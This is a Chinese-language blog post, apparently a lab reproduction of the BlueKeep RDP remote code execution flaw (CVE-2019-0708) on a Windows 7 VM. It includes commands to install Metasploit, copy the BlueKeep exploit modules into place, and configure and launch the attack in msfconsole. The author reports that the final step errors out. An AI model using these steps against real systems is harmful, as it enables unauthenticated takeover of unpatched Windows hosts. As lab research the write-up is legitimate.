CVE-2019-0708 Emersion
CVE-2019-0708 Emersion
最近威胁度非常高的CVE-2019-0708(Remote Desktop Protocol)在前几日放出了疑似可用的exp,ATD安全团队第一时间进行了复现,发现exp可以使用,将此次事件等级定为严重威胁。
目前此exp只适用于Windows 7和Windows Server 2008 R2 x64。
漏洞详情
CVE-2019-0708,属于任意代码远程执行漏洞,当未经身份验证的攻击者使用RDP连接到目标系统并发送特制请求时,即可以触发该漏洞。此漏洞属于预身份验证,无需用户交互,成功利用此漏洞的攻击者可以安装应用程序,查看、更改或删除数据或创建具有完全用户权限的新账户。
漏洞利用
使用VMware安装Windows7 SP1模拟受害机,使用Kali 2019.1模拟攻击机。
复现环境
受害机:Windows7 SP1/Windows Server 2008R2
下载地址:ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/
安装Metasploit
如果你是用的是Kali,可以跳过这一步。
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
Exp
此Exp利用需要用到Metasploit框架,Exp作者已经Pull到Metasploit官方仓库,但是Metasploit官方还未合并,所以这里我们手动加入Exp。
Exp下载地址:点我下载
下载后件放置文件到msf的相应文件夹(如果已存在同名文件,直接覆盖即可)
rdp.rb -> /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb -> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb -> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cve_2019_0708_bluekeep_rce.rb -> /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
不懂的话直接复制命令吧(仅限kali)
cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
mkdir /usr/share/metasploit-framework/modules/exploits/windows/rdp/
cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
攻击命令
使用msfconsole
进入metasploit-framework
进入以后使用reload_all
重新加载0708rdp利用模块
使用use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
启用0708RDP攻击模块
使用info
查看工具相关信息以及设置
可见关键设置主要为RHOSTS
\ RPORT
\ target
使用set RHOSTS 受害机IP
设置受害机IP
使用set RPORT 受害机PORT
设置受害机RDP端口号
使用set target ID数字(可选为0-4)
设置受害机机器架构
这里我们使用的是VMware,那么target 3满足条件
使用exploit
开始攻击,等待建立连接
但是新的问题出现了,最后一步报错,但是可以验证目标服务器是有漏洞的。
看了一下在网上搜了一下,发现有人遇到了同样的问题,但是没有解决,猜测不能复现的问题可能是SSL版本问题,因为 Debian/Kali默认为TLSv1.2。
明天再看看吧。
当前页面是本站的「Google AMP」版。查看和发表评论请点击:完整版 »